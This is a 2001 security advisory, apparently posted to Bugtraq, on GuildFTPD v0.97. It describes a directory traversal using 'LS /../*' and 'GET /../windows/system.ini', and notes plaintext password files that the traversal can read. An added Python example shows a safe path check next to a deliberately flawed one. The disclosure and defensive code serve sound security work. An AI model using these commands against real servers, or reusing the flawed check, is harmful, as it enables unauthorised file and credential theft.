GuildFTPD v0.97 Directory Traversal / Weak password encryption
Date: Sat, 26 May 2001 09:44:47 -0700 (PDT)
From: ByteRage <byterage@yahoo.com>
To: bugtraq@securityfocus.com
Subject: GuildFTPD v0.97 Directory Traversal / Weak password encryption

AFFECTED SYSTEMS

GuildFTPD v0.97
tested on Windows 9x, probably works on NT / 2k as well

DESCRIPTION

1) Directory Traversal
Consider the following FTP session (I'm using Windows'
FTP.EXE proggie, and its associated commands):

The following commands:
CD ../
CD .../
CD /.../
CD c:\
etc...
all give "550 Access denied." errors, so the front door
seems to be closed... The following stuff *does* work,
however:

LS /../*

This way, we can map out the whole hard drive...
Another example: LS /../../windows/*

Now, to retrieve a file, do something like:

GET /../windows/system.ini c:\received-file.txt
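
As an added, defender-side example (not part of the advisory and not GuildFTPD's own code): a path-containment routine that the requests listed above would not get past, shown beside a hypothetical prefix-only check of the kind the advisory's symptoms suggest. FTP_ROOT, the function names and the sample paths are assumptions made for this example.

```python
import ntpath
from typing import List, Optional

# Constructed example value (not GuildFTPD's configuration): the directory
# every FTP client is supposed to be confined to.
FTP_ROOT = r"C:\ftproot"

def naive_is_allowed(requested: str) -> bool:
    """Hypothetical prefix check modelled on the advisory's symptoms: it blocks
    '../', '.../', '/.../' and drive letters but never normalises the path, so
    a request that merely *starts* with '/' slips through ('/../*')."""
    if requested.startswith(("../", ".../", "/.../")):
        return False
    if len(requested) > 1 and requested[1] == ":":
        return False
    return True

def map_to_fs_path(cwd: str, requested: str) -> Optional[str]:
    """Resolve a client-supplied path against the virtual root and return the
    real filesystem path, or None if the request would leave FTP_ROOT."""
    virtual = requested.replace("\\", "/")   # Windows clients send both separators
    if ":" in virtual:                       # 'c:\' style drive references
        return None
    if not virtual.startswith("/"):
        virtual = cwd.rstrip("/") + "/" + virtual
    stack: List[str] = []
    for comp in virtual.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not stack:        # '..' while already at the root: refuse, don't clamp
                return None
            stack.pop()
            continue
        if set(comp) == {"."}:   # '...' and longer: ambiguous on Win9x, refuse
            return None
        stack.append(comp)       # a glob such as '*' is just a component here
    fs_path = ntpath.join(FTP_ROOT, *stack) if stack else FTP_ROOT
    # Defence in depth: after OS normalisation the result must still sit under the root.
    if ntpath.commonpath([ntpath.normpath(fs_path), FTP_ROOT]) != FTP_ROOT:
        return None
    return fs_path
```

A server that rejects (and logs) the None case closes both the LS and GET variants above, since the decision is made on the resolved path rather than on how the request happens to be spelled.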

2) Weak password encryption
And another thing... I don't want to whine to the guys
who wrote this program, but storing the user:password
pairs in plaintext in the program directory (the
default.usr & default?.usr files) is asking for
trouble: most FTP servers at least provide some way of
encryption / hashing... When you combine this with the
traversal bug, anyone can get the passwords of all the
users by grabbing the default.usr file.

VENDOR STATUS

I have sent this advisory to both DrPhibez
<guildftpd@ztnet.com> and Nitro187 (Matthew Flewelling)
<nitro@zophar.net>, the programmers of GuildFTPD.


[ByteRage] <byterage@yahoo.com> [www.byterage.cjb.net]
